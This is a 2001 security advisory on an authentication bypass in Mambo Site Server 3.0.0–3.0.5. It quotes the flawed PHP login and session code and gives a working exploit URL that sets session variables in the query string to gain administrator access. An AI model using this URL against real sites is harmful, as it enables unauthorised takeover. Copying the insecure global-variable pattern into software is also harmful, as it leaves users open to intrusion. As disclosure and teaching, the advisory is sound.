mambo_advisorie.txt

`Serious security hole in Mambo Site Server version 3.0.X  
Jul, 24 2001  
by: Ismael Peinado Palomo - [email protected]  
www.reverseonline.com  
  
Summary   
Mambo Site Server is a dynamic portal engine and content management tool  
based on PHP and MySQL.  
  
Details   
Vulnerable systems:   
Mambo Site Server version 3.0.0 - 3.0.5  
  
Immune systems:   
  
Impact:   
Any user can gain administrator privileges.   
  
Exploits:   
  
Under 'administrator/' dir. we found that index.php checks the user and password:  
  
if (isset($submit)){  
$query = "SELECT id, password, name FROM users WHERE username='$myname' AND (usertype='administrator' OR usertype='superadministrator')";  
$result = $database->openConnectionWithReturn($query);  
if (mysql_num_rows($result)!= 0){  
list($userid, $dbpass, $fullname) = mysql_fetch_array($result);  
  
.....  
  
if (strcmp($dbpass,$pass)) {  
//if the password entered does not match the database record ask user to login again  
print "<SCRIPT>alert('Incorrect Username and Password, please try again'); document.location.href='index.php';</SCRIPT>\n";  
}else {  
//if the password matches the database  
if ($remember!="on"){  
//if the user does not want the password remembered and the cookie is set, delete the cookie  
if ($passwordcookie!=""){  
setcookie("passwordcookie");  
$passwordcookie="";   
}  
}  
//set up the admin session then take the user into the admin section of the site  
session_register("myname");  
session_register("fullname");  
session_register("userid");  
print "<SCRIPT>window.open('index2.php','newwindow');</SCRIPT>\n";  
print "<SCRIPT>document.location.href='$live_site'</SCRIPT>\n";  
  
}  
}else {  
print "<SCRIPT>alert('Incorrect Username and Password, please try again'); document.location.href='index.php';</SCRIPT>\n";  
}  
  
as we can see if the password for administrator matches the one in the database, some variables are registered in the session and we are redirected to index2.php...so lets take a look at index2.php....  
  
if (!$PHPSESSID){  
print "<SCRIPT>document.location.href='index.php'</SCRIPT>\n";  
exit(0);  
}  
else {  
session_start();  
if (!$myname) session_register("myname");  
if (!$fullname) session_register("fullname");  
if (!$uid) session_register("userid");  
}  
  
Here we can see the only verification of a valid user is through the global var. PHPSESSID, so if we declare that variable on the url, and set the 'myname','fullname' and 'userid' we can gain administrative control...so we'll test:  
  
http://target.machine/administrator/index2.php?PHPSESSID=1&myname=admin&fullname=admin&userid=administrator  
  
BINGO!! now we have full administrative privileges...that's a typical example of PHP hacking...it's clear that security can't rely on global variables since they may be modifyed through url parsing.  
  
Ismael Peinado Palomo  
Ingeniero Jefe I+D  
[email protected]  
www.reverseonline.com  
`